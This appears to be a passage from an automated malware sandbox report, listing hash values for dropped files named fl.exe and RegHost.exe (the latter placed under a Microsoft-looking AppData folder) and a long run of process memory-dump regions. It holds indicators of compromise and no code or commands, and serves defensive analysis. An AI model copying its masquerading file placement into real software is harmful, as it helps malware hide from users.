SHA51236079c25f17ce81de7ebe8b3225421191ba73c1f7a9cf049c7bbc818f8b2b5c157e279dc8e2aeb3d5addb93e233768792ad52a2e75218d55ddfeaf46e30e20ec
-
C:\Users\Admin\AppData\Local\Temp\fl.exeMD5
600c20e18834769dc0ae528c69108a5d
SHA1743b942a951d381c0e3efc1fac3e2f09740769c2
SHA256b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb
SHA51236079c25f17ce81de7ebe8b3225421191ba73c1f7a9cf049c7bbc818f8b2b5c157e279dc8e2aeb3d5addb93e233768792ad52a2e75218d55ddfeaf46e30e20ec
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
600c20e18834769dc0ae528c69108a5d
SHA1743b942a951d381c0e3efc1fac3e2f09740769c2
SHA256b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb
SHA51236079c25f17ce81de7ebe8b3225421191ba73c1f7a9cf049c7bbc818f8b2b5c157e279dc8e2aeb3d5addb93e233768792ad52a2e75218d55ddfeaf46e30e20ec
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
600c20e18834769dc0ae528c69108a5d
SHA1743b942a951d381c0e3efc1fac3e2f09740769c2
SHA256b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb
SHA51236079c25f17ce81de7ebe8b3225421191ba73c1f7a9cf049c7bbc818f8b2b5c157e279dc8e2aeb3d5addb93e233768792ad52a2e75218d55ddfeaf46e30e20ec
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
600c20e18834769dc0ae528c69108a5d
SHA1743b942a951d381c0e3efc1fac3e2f09740769c2
SHA256b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb
SHA51236079c25f17ce81de7ebe8b3225421191ba73c1f7a9cf049c7bbc818f8b2b5c157e279dc8e2aeb3d5addb93e233768792ad52a2e75218d55ddfeaf46e30e20ec
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
600c20e18834769dc0ae528c69108a5d
SHA1743b942a951d381c0e3efc1fac3e2f09740769c2
SHA256b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb
SHA51236079c25f17ce81de7ebe8b3225421191ba73c1f7a9cf049c7bbc818f8b2b5c157e279dc8e2aeb3d5addb93e233768792ad52a2e75218d55ddfeaf46e30e20ec
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
600c20e18834769dc0ae528c69108a5d
SHA1743b942a951d381c0e3efc1fac3e2f09740769c2
SHA256b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb
SHA51236079c25f17ce81de7ebe8b3225421191ba73c1f7a9cf049c7bbc818f8b2b5c157e279dc8e2aeb3d5addb93e233768792ad52a2e75218d55ddfeaf46e30e20ec
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
600c20e18834769dc0ae528c69108a5d
SHA1743b942a951d381c0e3efc1fac3e2f09740769c2
SHA256b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb
SHA51236079c25f17ce81de7ebe8b3225421191ba73c1f7a9cf049c7bbc818f8b2b5c157e279dc8e2aeb3d5addb93e233768792ad52a2e75218d55ddfeaf46e30e20ec
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
600c20e18834769dc0ae528c69108a5d
SHA1743b942a951d381c0e3efc1fac3e2f09740769c2
SHA256b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb
SHA51236079c25f17ce81de7ebe8b3225421191ba73c1f7a9cf049c7bbc818f8b2b5c157e279dc8e2aeb3d5addb93e233768792ad52a2e75218d55ddfeaf46e30e20ec
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
600c20e18834769dc0ae528c69108a5d
SHA1743b942a951d381c0e3efc1fac3e2f09740769c2
SHA256b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb
SHA51236079c25f17ce81de7ebe8b3225421191ba73c1f7a9cf049c7bbc818f8b2b5c157e279dc8e2aeb3d5addb93e233768792ad52a2e75218d55ddfeaf46e30e20ec
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
600c20e18834769dc0ae528c69108a5d
SHA1743b942a951d381c0e3efc1fac3e2f09740769c2
SHA256b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb
SHA51236079c25f17ce81de7ebe8b3225421191ba73c1f7a9cf049c7bbc818f8b2b5c157e279dc8e2aeb3d5addb93e233768792ad52a2e75218d55ddfeaf46e30e20ec
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
600c20e18834769dc0ae528c69108a5d
SHA1743b942a951d381c0e3efc1fac3e2f09740769c2
SHA256b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb
SHA51236079c25f17ce81de7ebe8b3225421191ba73c1f7a9cf049c7bbc818f8b2b5c157e279dc8e2aeb3d5addb93e233768792ad52a2e75218d55ddfeaf46e30e20ec
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
600c20e18834769dc0ae528c69108a5d
SHA1743b942a951d381c0e3efc1fac3e2f09740769c2
SHA256b8931e787497efcd1306a1b86529f1d930084650fd6c38fd7051bc167b02e6fb
SHA51236079c25f17ce81de7ebe8b3225421191ba73c1f7a9cf049c7bbc818f8b2b5c157e279dc8e2aeb3d5addb93e233768792ad52a2e75218d55ddfeaf46e30e20ec
-
memory/696-180-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/1032-205-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/1032-204-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/1032-203-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/1060-151-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/1060-150-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/1104-194-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/1432-156-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/1432-155-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/1432-154-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/2064-159-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/2124-198-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/2124-196-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/2124-197-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/2372-187-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/2660-182-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/2660-183-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/2660-184-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/2696-162-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/2696-161-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/2696-163-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/2900-201-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/3192-149-0x0000000140000000-0x000000014274C000-memory.dmpFilesize
39.3MB
-
memory/3236-211-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/3236-210-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/3236-212-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/3404-218-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/3404-217-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/3404-219-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/3472-208-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/3688-139-0x00000000061B0000-0x0000000006226000-memory.dmpFilesize
472KB
-
memory/3688-127-0x0000000003080000-0x0000000003081000-memory.dmpFilesize
4KB
-
memory/3688-119-0x0000000000A30000-0x0000000000B0C000-memory.dmpFilesize
880KB
-
memory/3688-120-0x0000000000700000-0x0000000000701000-memory.dmpFilesize
4KB
-
memory/3688-121-0x00000000025B0000-0x00000000025F4000-memory.dmpFilesize
272KB
-
memory/3688-122-0x00000000767B0000-0x0000000076972000-memory.dmpFilesize
1.8MB
-
memory/3688-123-0x0000000077550000-0x0000000077641000-memory.dmpFilesize
964KB
-
memory/3688-124-0x0000000000A30000-0x0000000000B0C000-memory.dmpFilesize
880KB
-
memory/3688-125-0x0000000000A30000-0x0000000000B0C000-memory.dmpFilesize
880KB
-
memory/3688-126-0x0000000072880000-0x0000000072900000-memory.dmpFilesize
512KB
-
memory/3688-128-0x0000000005760000-0x0000000005D66000-memory.dmpFilesize
6.0MB
-
memory/3688-129-0x0000000002FC0000-0x0000000002FD2000-memory.dmpFilesize
72KB
-
memory/3688-143-0x00000000066A0000-0x00000000066F0000-memory.dmpFilesize
320KB
-
memory/3688-142-0x0000000007160000-0x000000000768C000-memory.dmpFilesize
5.2MB
-
memory/3688-141-0x0000000006390000-0x00000000063AE000-memory.dmpFilesize
120KB
-
memory/3688-140-0x0000000006730000-0x0000000006C2E000-memory.dmpFilesize
5.0MB
-
memory/3688-118-0x0000000000A30000-0x0000000000B0C000-memory.dmpFilesize
880KB
-
memory/3688-138-0x0000000006110000-0x00000000061A2000-memory.dmpFilesize
584KB
-
memory/3688-130-0x0000000005260000-0x000000000536A000-memory.dmpFilesize
1.0MB
-
memory/3688-131-0x0000000003020000-0x000000000305E000-memory.dmpFilesize
248KB
-
memory/3688-132-0x0000000005540000-0x0000000005702000-memory.dmpFilesize
1.8MB
-
memory/3688-137-0x0000000005370000-0x00000000053D6000-memory.dmpFilesize
408KB
-
memory/3688-136-0x0000000070AD0000-0x0000000070B1B000-memory.dmpFilesize
300KB
-
memory/3688-135-0x0000000003090000-0x00000000030DB000-memory.dmpFilesize
300KB
-
memory/3688-134-0x0000000074C00000-0x0000000075F48000-memory.dmpFilesize
19.3MB
-
memory/3688-133-0x0000000076980000-0x0000000076F04000-memory.dmpFilesize
5.5MB
-
memory/4100-215-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/4348-147-0x00007FF782200000-0x00007FF78263B000-memory.dmpFilesize
4.2MB
-
memory/4348-146-0x00007FF782200000-0x00007FF78263B000-memory.dmpFilesize
4.2MB
-
memory/4348-148-0x00007FF782200000-0x00007FF78263B000-memory.dmpFilesize
4.2MB
-
memory/4536-190-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/4536-189-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/4536-191-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/4792-166-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/4832-173-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/4900-170-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/4900-169-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/4900-168-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/4948-175-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/4948-176-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/4948-177-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB